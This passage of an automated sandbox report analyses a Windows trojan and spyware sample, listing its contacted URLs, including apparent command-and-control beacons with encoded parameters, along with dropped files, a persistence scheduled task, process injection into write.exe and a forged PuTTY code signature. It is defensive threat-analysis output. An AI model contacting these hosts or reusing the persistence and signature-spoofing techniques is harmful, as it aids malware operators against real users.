            http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
            https://track.uc.cn/collect0%VirustotalBrowse
            https://www.witoharmuth.de/kontakt/0%VirustotalBrowse
            https://themeisle.com0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.20%Avira URL Cloudsafe
            https://www.west.cn/services/mail/0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/js/script.min.js?ver=3.0.210%VirustotalBrowse
            http://www.webuyfontana.com/fhu0/0%Avira URL Cloudsafe
            https://js.users.51.la/21876343.js0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/css/bootstrap.min.css?ver=1.0.20%VirustotalBrowse
            http://www.lecoinsa.net/xu8t/0%Avira URL Cloudsafe
            http://www.binpvae.lol/a472/0%Avira URL Cloudsafe
            http://www.shrongcen.com/5965/?TTv82Lg=9jQYDwKIZi6/W0GvqqOWctdn1nDe86qQU37QFI3e35aKJbsuGODGFib0m7CCxXxx0blg9Tj0Vv9f5L3iX8JxT+4MBVsytoUBFOmu7GzeNBgPNO5fqFAxhyq0WiRZHbK4BA==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://www.witoharmuth.de/feed/0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%VirustotalBrowse
            http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%Avira URL Cloudsafe
            https://js.users.51.la/21876343.js3%VirustotalBrowse
            http://www.witoharmuth.com/jd4u/0%Avira URL Cloudsafe
            http://www.duzane.com/6tsi/0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?0%Avira URL Cloudsafe
            http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%VirustotalBrowse
            http://www.zhuan-tou.com/lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?656519d7bd35a3f2337e0cc6c7d88db20%Avira URL Cloudsafe
            https://www.witoharmuth.de/feed/0%VirustotalBrowse
            http://www.lunareafurniture.com0%Avira URL Cloudsafe
            http://www.witoharmuth.com/jd4u/0%VirustotalBrowse
            https://hm.baidu.com/hm.js?0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a720%Avira URL Cloudsafe
            https://www.west.cn/cloudhost/0%Avira URL Cloudsafe
            http://www.shrongcen.com/5965/0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            https://www.witoharmuth.de/sample-page/0%Avira URL Cloudsafe
            https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js0%VirustotalBrowse
            https://www.west.cn/cloudhost/0%VirustotalBrowse
            http://www.witoharmuth.com/jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%VirustotalBrowse
            http://www.witoharmuth.de/wp-content/uploads/2022/02/P1010619-scaled.jpg);0%VirustotalBrowse
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%Avira URL Cloudsafe
            https://www.witoharmuth.de/sample-page/0%VirustotalBrowse
            https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a720%VirustotalBrowse
            https://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
            http://www.ie8mce.website/3osa/?kH=00U8ENLHk&TTv82Lg=AxLVOe86WIqquROk4wW2qAARSAB2s4BJoZSnRO1SGEf+ewBgrgY/U4+QoHX9+oVsrlzSfgcLZGl64XyGJnoqgpfIm3dacYKZHld6caimAIQJPM6fBdCSw8qvz7rbMrI9Lg==0%Avira URL Cloudsafe
            https://www.witoharmuth.de/xmlrpc.php?rsd0%Avira URL Cloudsafe
            https://download.quark.cn/download/quarkpc?platform=android&ch=pcquark0%Avira URL Cloudsafe
            https://image.uc.cn/s/uae/g/3o/berg/static/index.c4bc5b38d870fecd8a1f.css0%VirustotalBrowse
            https://www.witoharmuth.de/comments/feed/0%Avira URL Cloudsafe
            http://www.am1-728585.com/9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ==0%Avira URL Cloudsafe
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
            https://www.west.cn/services/webhosting/0%Avira URL Cloudsafe
            http://www.webuyfontana.com/0%Avira URL Cloudsafe
            http://www.chowzen.top/fv92/?TTv82Lg=yI7uf9Jd8tsljExy4FTr0CscnPTbskSU+DRNkHPE+tdYilYSwjyHdOnSjMDaN65WqOB1l5kApI34wyc+ZLKDjlKfvq1mMUqSyQn9fVkF1OZZ/SY1Zq2D8T+x+vB090fBaA==&kH=00U8ENLHk0%Avira URL Cloudsafe
            http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/assets/bootstrap/js/bootstrap.min.js?ver=1.0.20%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/css/dist/block-library/style.min.css?ver=6.5.40%Avira URL Cloudsafe
            http://www.duzane.com/6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw==0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-includes/js/jquery/ui/core.min.js?ver=1.13.20%Avira URL Cloudsafe
            https://api.w.org/0%Avira URL Cloudsafe
            https://www.west.cn/services/domain/0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://www.mg55aa.xyz/2c61/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/wp-json/0%Avira URL Cloudsafe
            http://www.zhuan-tou.com/lx5p/0%Avira URL Cloudsafe
            https://www.witoharmuth.de/0%Avira URL Cloudsafe
            http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)0%Avira URL Cloudsafe
            http://www.witoharmuth.de/wp-content/themes/hestia/style.min.css?ver=3.0.210%Avira URL Cloudsafe
            https://www.witoharmuth.de/ueber/0%Avira URL Cloudsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%Avira URL Cloudsafe
            http://www.chowzen.top/fv92/0%Avira URL Cloudsafe
            http://www.lunareafurniture.com/wzcd/?kH=00U8ENLHk&TTv82Lg=FQzs5Gm41lAoc3qf/wWkUZspwwlJHXnDtyrZ3MD2xwlMLvR0+259MhI7Qpdm6NFMCSb0/6QDX0X/DlKTMMPY62KD9eqkA6d10wTN4I0Oir4qL663QSRv2YyvDfJ8itAe1g==0%Avira URL Cloudsafe
            http://gmpg.org/xfn/110%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
Name    Malicious    Antivirus Detection    Reputation
Name    Source    Malicious    Antivirus Detection    Reputation
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.west.cn/jiaoyi/write.exe, 00000015.00000002.4525142132.00000000068FA000.00000004.10000000.00040000.00000000.sdmp, write.exe, 00000015.00000002.4526781049.0000000007CC0000.00000004.00000800.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003FFA000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.witoharmuth.de/wp-content/plugins/quiz-maker/public/css/quiz-maker-public.css?ver=6.3.3.0write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://zijrmf.com/registerwrite.exe, 00000015.00000002.4525142132.0000000006120000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003820000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://www.witoharmuth.de/portfolio/write.exe, 00000015.00000002.4525142132.0000000005946000.00000004.10000000.00040000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000015.00000003.2563564152.0000000008018000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://www.witoharmuth.de/blog/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.witoharmuth.de/projekt-details/RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000002.4524665567.0000000003046000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      Joe Sandbox version:40.0.0 Tourmaline
                                      Analysis ID:1454436
                                      Start date and time:2024-06-10 10:19:08 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 12m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of new started processes analysed:24
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:2
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:CFV20240600121.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@31/16@16/14
                                      EGA Information:
                                      • Successful, ratio: 80%
                                      HCA Information:
                                      • Successful, ratio: 93%
                                      • Number of executed functions: 200
                                      • Number of non-executed functions: 289
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • Not all processes were analyzed, report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      Time      Type             Description
                                      04:20:02  API Interceptor  2x Sleep call for process: CFV20240600121.exe modified
                                      04:20:04  API Interceptor  56x Sleep call for process: powershell.exe modified
                                      04:20:09  API Interceptor  2x Sleep call for process: BPSHhDGmARC.exe modified
                                      04:21:10  API Interceptor  10907428x Sleep call for process: write.exe modified
                                      10:20:06  Task Scheduler   Run new task: BPSHhDGmARC path: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      Process:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:false
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):1216
                                      Entropy (8bit):5.34331486778365
                                      Encrypted:false
                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):2232
                                      Entropy (8bit):5.379460230152629
                                      Encrypted:false
                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                      MD5:4DC84D28CF28EAE82806A5390E5721C8
                                      SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                      SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                      SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\write.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                      Category:dropped
                                      Size (bytes):196608
                                      Entropy (8bit):1.121297215059106
                                      Encrypted:false
                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                      Malicious:false
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                      Process:C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1584
                                      Entropy (8bit):5.107981523371107
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgergYrFdOFzOzN33ODOiDdKrsuTDv
                                      MD5:F8403D2D1F01438A420B87D8870F7878
                                      SHA1:3BF4C061AFA5BFAAADCB74AC3CBCB571430283C4
                                      SHA-256:1AA60286C0344C7EA6FD89B7584A6C485406B169CF8038FABC14A3CD9CB61503
                                      SHA-512:4CA868716B73D864102AC83CC2DC6B00D26D3924565A6D306A2E439FDBD7160917E21A01BB0C61D9DE809B2E5161651872B7D18A872CAF85F592E07ABAC34553
                                      Malicious:false
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:XML 1.0 document, ASCII text
                                      Category:dropped
                                      Size (bytes):1584
                                      Entropy (8bit):5.107981523371107
                                      Encrypted:false
                                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNt9xvn:cgergYrFdOFzOzN33ODOiDdKrsuTDv
                                      MD5:F8403D2D1F01438A420B87D8870F7878
                                      SHA1:3BF4C061AFA5BFAAADCB74AC3CBCB571430283C4
                                      SHA-256:1AA60286C0344C7EA6FD89B7584A6C485406B169CF8038FABC14A3CD9CB61503
                                      SHA-512:4CA868716B73D864102AC83CC2DC6B00D26D3924565A6D306A2E439FDBD7160917E21A01BB0C61D9DE809B2E5161651872B7D18A872CAF85F592E07ABAC34553
                                      Malicious:true
                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):773640
                                      Entropy (8bit):7.950922078829525
                                      Encrypted:false
                                      SSDEEP:12288:KX0pxQV36Di8BtLF6hs8KymBqr7bO3n68H6gf28x3tZQsjTxNT/xpIw1XkR:KBFKn6yBi2Kg6gfJx33H/xej
                                      MD5:8874212365EF57AEEE15045F9EC684EB
                                      SHA1:F509011E519095509F0368DC9289BDC6A48EBE96
                                      SHA-256:AD27785339182485262A3A4B39D554D00AA73CB1CA437A28B181DF2901036404
                                      SHA-512:AE9639A3B83397F57A2BB0D58F6C9354F987E8851C0A29F68EFFD91AC01F1C4CE2DCEFD33CC5C9C0E13688202CDB0DD063155406A0744CB2037BAF98E07E7273
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 29%
                                      Process:C:\Users\user\Desktop\CFV20240600121.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):7.950922078829525
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                      • Win32 Executable (generic) a (10002005/4) 49.93%
                                      • Windows Screen Saver (13104/52) 0.07%
                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      File name:CFV20240600121.exe
                                      File size:773'640 bytes
                                      MD5:8874212365ef57aeee15045f9ec684eb
                                      SHA1:f509011e519095509f0368dc9289bdc6a48ebe96
                                      SHA256:ad27785339182485262a3a4b39d554d00aa73cb1ca437a28b181df2901036404
                                      SHA512:ae9639a3b83397f57a2bb0d58f6c9354f987e8851c0a29f68effd91ac01f1c4ce2dcefd33cc5c9c0e13688202cdb0dd063155406a0744cb2037baf98e07e7273
                                      SSDEEP:12288:KX0pxQV36Di8BtLF6hs8KymBqr7bO3n68H6gf28x3tZQsjTxNT/xpIw1XkR:KBFKn6yBi2Kg6gfJx33H/xej
                                      TLSH:34F42348375CBB86E4BE8BB80076B47443F370CA186AD19AEEEC95CC21937A18357D57
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...3iff..............0..h...(........... ........@.. ....................................@................................
                                      Icon Hash:c5a5a45716969696
                                      Entrypoint:0x4b851e
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x66666933 [Mon Jun 10 02:47:15 2024 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                      Signature Valid:false
                                      Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 13/11/2018 01:00:00 09/11/2021 00:59:59
                                      Subject Chain
                                      • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                      Version:3
                                      Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                      Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                      Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                      Serial:7C1118CBBADC95DA3752C46E47A27438
                                      Instruction
                                      jmp dword ptr [00402000h]
                                      Name | Virtual Address | Virtual Size | Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb84cc | 0x4f | .text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xba000 | 0x1ecc | .rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0xb9800 | 0x3608 |
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xbc000 | 0xc | .reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
